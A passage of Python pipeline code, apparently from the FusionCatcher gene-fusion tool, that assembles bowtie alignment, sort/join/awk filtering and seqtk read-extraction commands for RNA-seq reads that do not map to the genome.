job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--un',fqo,kind='output',temp_path=temp_flag) # <== reads which do not map on transcriptome and genome! 
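# trim2 scheme (informal): with L = len_reads, K = options.trim_3end_keep2,
# A = anchorx and H = avgx = int((L - A - K)/2), the four bowtie passes of this
# trim2 block keep, respectively, the first K bases (--trim3 L-K), the last A
# bases (--trim5 L-A), the first K+H bases (--trim3 L-K-H) and the last A+H
# bases (--trim5 L-A-H) of every still-unmapped read, and each pass tags its
# alignments with a pass id 1..4 in the awk step that follows it.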
####### job.add('--max',outdir('reads_filtered_genome-transcriptome_multiple_trim2_3end.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',fqi,kind='input') job.add('',fmapo,kind='output') # trim2 job.add('2>',outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome_trim2_3end.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',fmapo,kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('";"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f','1,4',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',kind='parameter') job.add("""'{print $1"\\t"$2"\\t1"}'""",kind='parameter') job.add('>',fmapo+".1",kind='output') job.run() fqo = outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_trim2_5end.fq') fmapo = outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_5end.map') job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k',trim2_bowtie_k,kind='parameter') job.add('-v','0',kind='parameter') job.add('--trim5',len_reads-anchorx,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--phred33-quals',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if trim2_bowtie_try_hard: job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--un',fqo,kind='output',temp_path=temp_flag) # <== reads which do not map on transcriptome and genome! 
####### job.add('--max',outdir('reads_filtered_genome-transcriptome_multiple_trim2_5end.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',fqi,kind='input') job.add('',fmapo,kind='output') # trim2 job.add('2>',outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome_trim2_5end.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',fmapo,kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('";"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f','1,4',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',kind='parameter') job.add("""'{print $1"\\t"$2"\\t2"}'""",kind='parameter') job.add('>',fmapo+".2",kind='output') job.run() fqo = outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_trim2_3end-half.fq') fmapo = outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end-half.map') job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k',trim2_bowtie_k,kind='parameter') job.add('-v','0',kind='parameter') job.add('--trim3',len_reads-options.trim_3end_keep2-avgx,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--phred33-quals',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if trim2_bowtie_try_hard: job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--un',fqo,kind='output',temp_path=temp_flag) # <== reads which do not map on transcriptome and genome! 
####### job.add('--max',outdir('reads_filtered_genome-transcriptome_multiple_trim2_3end-half.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',fqi,kind='input') job.add('',fmapo,kind='output') # trim2 job.add('2>',outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome_trim2_3end-half.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',fmapo,kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('";"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f','1,4',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',kind='parameter') job.add("""'{print $1"\\t"$2"\\t3"}'""",kind='parameter') job.add('>',fmapo+".3",kind='output') job.run() fqo = outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_trim2_5end-half.fq') fmapo = outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_5end-half.map') job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k',trim2_bowtie_k,kind='parameter') job.add('-v','0',kind='parameter') job.add('--trim5',len_reads-anchorx-avgx,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--phred33-quals',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if trim2_bowtie_try_hard: job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--un',fqo,kind='output',temp_path=temp_flag) # <== reads which do not map on transcriptome and genome! 
####### job.add('--max',outdir('reads_filtered_genome-transcriptome_multiple_trim2_5end-half.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',fqi,kind='input') job.add('',fmapo,kind='output') # trim2 job.add('2>',outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome_trim2_5end-half.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',fmapo,kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('";"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f','1,4',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',kind='parameter') job.add("""'{print $1"\\t"$2"\\t4"}'""",kind='parameter') job.add('>',fmapo+".4",kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.1'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_5end-half.map.4'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('filter_map_pre-splitting.py',kind='parameter') job.add('-i','-',kind='parameter') job.add('-o',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.1'),kind='output') job.add('-x',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.ex.1'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') 
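# The pass ids make complementary trims joinable: roughly, a read whose 5' piece
# (pass 1) and 3' piece (pass 4) -- or 5' piece (pass 3) and 3' piece (pass 2) --
# hit different targets is kept as a potential split read. Minimal sketch of the
# idea in Python (illustrative only; filter_map_pre-splitting.py does the real work):
#
#   pairs = {}
#   for line in open('trim2.map.1-and-4'):           # "name\ttarget\tpass_id"
#       name, target, pid = line.rstrip('\n').split('\t')
#       pairs.setdefault(name, set()).add((target, pid))
#   split_candidates = [n for n, hits in pairs.items()
#                       if len(set(t for t, p in hits)) > 1]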
job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.sorted.map'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('join',kind='parameter') job.add('-1','1',kind='parameter') job.add('-2','1',kind='parameter') job.add('-t',"'\t'",kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.1'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.sorted.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.join.1.map'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end-half.map.3'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_5end.map.2'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add(_FC_+'filter_map_pre-splitting.py',kind='parameter') job.add('-i','-',kind='parameter') job.add('-o',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.2'),kind='output') job.add('-x',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.ex.2'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end-half.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end-half.sorted.map'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('join',kind='parameter') job.add('-1','1',kind='parameter') job.add('-2','1',kind='parameter') job.add('-t',"'\t'",kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.2'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end-half.sorted.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.join.2.map'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.ex.1'),kind='input',temp_path=temp_flag) 
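# Reminder on the 'join' calls in this block: both inputs must be sorted with
# LC_ALL=C on the join field (the read name in column 1). An equivalent manual
# invocation would be, approximately:
#
#   LC_ALL=C join -1 1 -2 1 -t $'\t' lhs.sorted.map rhs.sorted.map
#
# which prints one line per read name present in both files, with the remaining
# columns of both inputs appended after the shared key.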
job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.ex.2'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex'),kind='output') job.run() job.add(_FC_+'filter_pairs.py',kind='program') job.add('-i',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex'),kind='input') job.add('-g',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.good'),kind='output') job.add('-b',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.bad'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.join.1.map'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.join.2.map'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all-temp.map'),kind='output') job.run() if job.iff(not empty(outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.bad')), id = "#reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.bad#"): job.add('LC_ALL=C',kind='program') job.add('join',kind='parameter') job.add('-1','1',kind='parameter') job.add('-2','1',kind='parameter') job.add('-v','2',kind='parameter') job.add('-t',"'\t'",kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.bad'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all-temp.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map'),kind='output') job.run() else: job.link(outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all-temp.map'), outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map'), temp_path=temp_flag) job.clean(outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.bad'),temp_path=temp_flag) #job.clean(outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.good'),temp_path=temp_flag) job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("""'{n=length($1); r=substr($1,1,n-2); print r}'""",kind='parameter') 
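# The awk program just assembled drops the two trailing characters of each read
# name, i.e. the mate suffix, so that 'SOMEREAD/1' and 'SOMEREAD/2' both collapse
# to 'SOMEREAD' (read names are assumed here to carry the bowtie-style /1 or /2
# suffix); the uniq|sort steps that follow turn this into a unique id list.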
job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('reads_not-mapped_trim2_ids.txt'),kind='output') job.run() # job.add('printf',kind='program') # job.add(('"\n\nMapping on transcriptome the filtered reads which did not map on genome:\n'+ # '------------------------------------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome.stdout.txt'),kind='input') # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # extract ids of short reads which mapped on the transcriptome job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f','1',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome.map'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') # job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('list-names-reads-filtered_not-mapped-genome_mapped-transcriptome.txt'),kind='output') job.run() if not options.split_seqtk_subseq: #extract the short reads which mapped on the transcriptome and do not map on genome job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--input',outdir('reads_filtered_not-mapped-genome.fq'),kind='input') job.add('--list',outdir('list-names-reads-filtered_not-mapped-genome_mapped-transcriptome.txt'),kind='input') job.add('--output',outdir('reads_filtered_not-mapped-genome_mapped-transcriptome.fq'),kind='output') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. 
This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: #extract the short reads which mapped on the transcriptome and do not map on genome job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome.fq'),kind='input') job.add('',outdir('list-names-reads-filtered_not-mapped-genome_mapped-transcriptome.txt'),kind='input') job.add('>',outdir('reads_filtered_not-mapped-genome_mapped-transcriptome.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on the transcriptome and do not map on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome.fq'),kind='input') job.add('',outdir('list-names-reads-filtered_not-mapped-genome_mapped-transcriptome.txt'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_mapped-transcriptome.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) job.clean(outdir('reads_filtered_not-mapped-genome.fq'),temp_path=temp_flag) job.clean(outdir('list-names-reads-filtered_not-mapped-genome_mapped-transcriptome.txt'),temp_path=temp_flag) else: job.link(outdir('reads-filtered.fq'),outdir('reads_filtered_unique-mapped-genome.fq'),temp_path=temp_flag) job.add('touch',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_mapped-transcriptome.fq'),kind='output') job.run() ############################################################################## # MAPPING short reads (which map uniquely on genome) against the transcriptome ############################################################################## # map using the transcript index (not mapped, unique alignment, multiple alignments) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') #job.add('--solexa1.3-quals',kind='parameter') job.add('--phred33-quals',kind='parameter') job.add('--best',kind='parameter') job.add('--tryhard',kind='parameter') job.add('--strata',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',outdir('reads_filtered_unique-mapped-genome.fq'),kind='input') 
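# For reference, the seqtk subseq extraction used in the branches above amounts
# to (paths shortened, illustrative):
#
#   seqtk subseq reads_filtered_not-mapped-genome.fq \
#       list-names-reads-filtered_not-mapped-genome_mapped-transcriptome.txt \
#       > reads_filtered_not-mapped-genome_mapped-transcriptome.fq
#
# i.e. keep exactly the FASTQ records whose names appear in the id list; the
# extract_short_reads.py and seqtk-subseq.sh branches produce the same subset
# with different memory/CPU trade-offs.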
job.add('',outdir('reads_filtered_unique-mapped-genome_transcriptome_temp.map'),kind='output') job.add('2>',outdir('log_bowtie_reads_unique-mapped-genome_mapped-transcriptome.stdout.txt'),kind='parameter',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_bowtie_reads_unique-mapped-genome_mapped-transcriptome.stdout.txt'), tofile = info_file, top = ["Mapping on transcriptome the filtered reads which map uniquely on genome:", "------------------------------------------------------------------------"], bottom = "\n\n\n") if job.iff((not options.skip_genome_transcriptome_filtering) and (not empty(outdir('reads_filtered_genome.map'))),id="#genome_transcriptome_filtering#"): # filter the mapped reads on transcriptome wich mapped also on genome using mismatches job.add(_FC_+'remove_reads_genome_transcriptome.py',kind='program') job.add('--input_map_1',outdir('reads_filtered_genome.map'),kind='input',temp_path=temp_flag) job.add('--input_map_2',outdir('reads_filtered_unique-mapped-genome_transcriptome_temp.map'),kind='input',temp_path=temp_flag) job.add('--mismatches_column','5',kind='parameter') job.add('--output',outdir('reads_filtered_unique-mapped-genome_transcriptome.map'),kind='output') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') job.run() else: job.link(outdir('reads_filtered_unique-mapped-genome_transcriptome_temp.map'),outdir('reads_filtered_unique-mapped-genome_transcriptome.map'),temp_path=temp_flag) job.clean(outdir('reads_filtered_genome.map'),temp_path=temp_flag) # extract the names of the short reads which mapped on the transcriptome job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f','1',kind='parameter') job.add('',outdir('reads_filtered_unique-mapped-genome_transcriptome.map'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('list-names-reads-filtered_unique-mapped-genome_mapped-transcriptome.txt'),kind='output') job.run() # job.add('printf',kind='program') # job.add('"Count reads left mapping transcriptome and genome (before filtering out those with better mappings on genome):\n---------------------------------------------------\n "',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('reads_filtered_unique-mapped-genome.fq'),kind='input') # job.add('|',kind='parameter') # job.add("echo $((`wc -l`/4))",kind='parameter') # job.add('>>',info_file,kind='output') # job.run() if not options.split_seqtk_subseq: #extract the short reads which mapped on the transcriptome and do not map on genome job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--input',outdir('reads_filtered_unique-mapped-genome.fq'),kind='input') 
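# Note on remove_reads_genome_transcriptome.py (invoked earlier in this block):
# per read, it compares the genome alignment with the transcriptome alignment
# using the mismatch descriptors (column 5 of both .map files) and appears to
# drop transcriptome hits of reads that align strictly better on the genome;
# when that filtering is skipped, the unfiltered map is simply linked through.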
job.add('--list',outdir('list-names-reads-filtered_unique-mapped-genome_mapped-transcriptome.txt'),kind='input') job.add('--output',outdir('reads_filtered_unique-mapped-genome_mapped-transcriptome.fq'),kind='output') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: #extract the short reads which mapped on the transcriptome and do not map on genome job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads_filtered_unique-mapped-genome.fq'),kind='input') job.add('',outdir('list-names-reads-filtered_unique-mapped-genome_mapped-transcriptome.txt'),kind='input') job.add('>',outdir('reads_filtered_unique-mapped-genome_mapped-transcriptome.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on the transcriptome and do not map on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('reads_filtered_unique-mapped-genome.fq'),kind='input') job.add('',outdir('list-names-reads-filtered_unique-mapped-genome_mapped-transcriptome.txt'),kind='input') 